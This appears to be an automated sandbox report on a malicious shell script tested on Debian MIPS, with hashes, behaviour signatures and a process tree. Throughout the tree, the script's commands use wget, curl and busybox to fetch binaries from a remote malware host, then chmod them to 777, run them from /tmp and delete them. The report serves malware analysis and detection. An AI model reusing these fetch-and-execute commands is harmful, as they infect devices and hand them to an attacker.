Analysis
-
max time kernel
131s -
max time network
132s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:05
Static task
static1
Behavioral task
behavioral1
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh
-
Size
10KB
-
MD5
7632ec045de4b1033e7c4b16bc1ca67d
-
SHA1
761dbef5f61fe1d3fd78c27236662b075cc559ad
-
SHA256
08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e
-
SHA512
971fe55854409ae07deaca1bbdc26c698a414d163ad3eb5a9246d2da6216c552c294dde58c1df5d8d3d97c1e0323bb04a11b00cc5e8803588ba70f04f9dff75c
-
SSDEEP
192:UtRl0RBbqnWB0c7yWvxCptcUkXOIYqS7Ik4oIqS7IkuptcUkXO0c7yW1Rl0RBb44:UqInWB0c7yWvxCptcUkXOInozptcUkXD
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh/tmp/08be024fa0b049d7e4e608b384c463acc9042523b18c83eb81d43d240deffe3e.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:718
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh./G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵PID:745
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:746
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys./S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵PID:787
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:789
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:801
-
-
/bin/chmodchmod 777 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB./9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:804
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:805
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b5./YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:848
-
-
/bin/chmodchmod 777 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30./DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:855
-
-
/bin/chmodchmod 777 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX./gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:862
-
-
/bin/chmodchmod 777 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl./AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:865
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:866
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:869
-
-
/bin/chmodchmod 777 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj./Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI./QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx./u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6./DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵PID:893
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:897
-
-
/bin/chmodchmod 777 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0./9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:900
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:904
-
-
/bin/chmodchmod 777 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX./0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet./8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:914
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:915
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl./AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm AGQbCHyvdrbP2KadaXKvM1ubFcEthrvChl2⤵PID:921
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:922
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- System Network Configuration Discovery
PID:925
-
-
/bin/chmodchmod 777 gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX./gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm gxfQyMnZKFAMvhjLt6fukSU1qsKTPFNsqX2⤵PID:928
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- System Network Configuration Discovery
PID:932
-
-
/bin/chmodchmod 777 DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif6./DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm DjPO6joFyuZ1k0EVyt9Dx7utS24E3KAif62⤵PID:935
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- System Network Configuration Discovery
PID:939
-
-
/bin/chmodchmod 777 Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj./Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm Qxx5JuMvhSmofY6Fr0sdERLq9xId05Eyjj2⤵PID:942
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:943
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/chmodchmod 777 QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI./QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm QfoyH2Ujj7uZUgi8gQWNkcsQxHXhPl57jI2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- System Network Configuration Discovery
PID:953
-
-
/bin/chmodchmod 777 u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx./u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm u9xlp4U6onrsHo8pPPcYlGajcYM9LRpFAx2⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet./8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 8C28n8Ts9R19d3aoaSIJWHO2d7mGRC9Zet2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:967
-
-
/bin/chmodchmod 777 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq0./9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 9PFBav6JXd9HU7g8qQtQeSLIZVDMlh6bq02⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX./0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm 0Hps1FWLMqzlzgDmOWAC6djVwC0FXLKApX2⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:981
-
-
/bin/chmodchmod 777 DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/DF5OLHFToOpmRK3joDLpz0Y46NFECXaV30./DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm DF5OLHFToOpmRK3joDLpz0Y46NFECXaV302⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh./G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm G3OMXvLEenMuPwZPBLNwbd4nwpdWpbLVGh2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/S82B3midttp7tynH1d7SXU5VngkmPvSAys./S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm S82B3midttp7tynH1d7SXU5VngkmPvSAys2⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB./9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 9cMqXoKDmzxKMQd4FqT1BN3S6D3J7t7LcB2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- System Network Configuration Discovery
PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵PID:1009
-
-
/bin/chmodchmod 777 YpJqRceEuzEo5pogVIgx2m4WO7jk4eq6b52⤵
- File and Directory Permissions Modification
PID:1010
-
-
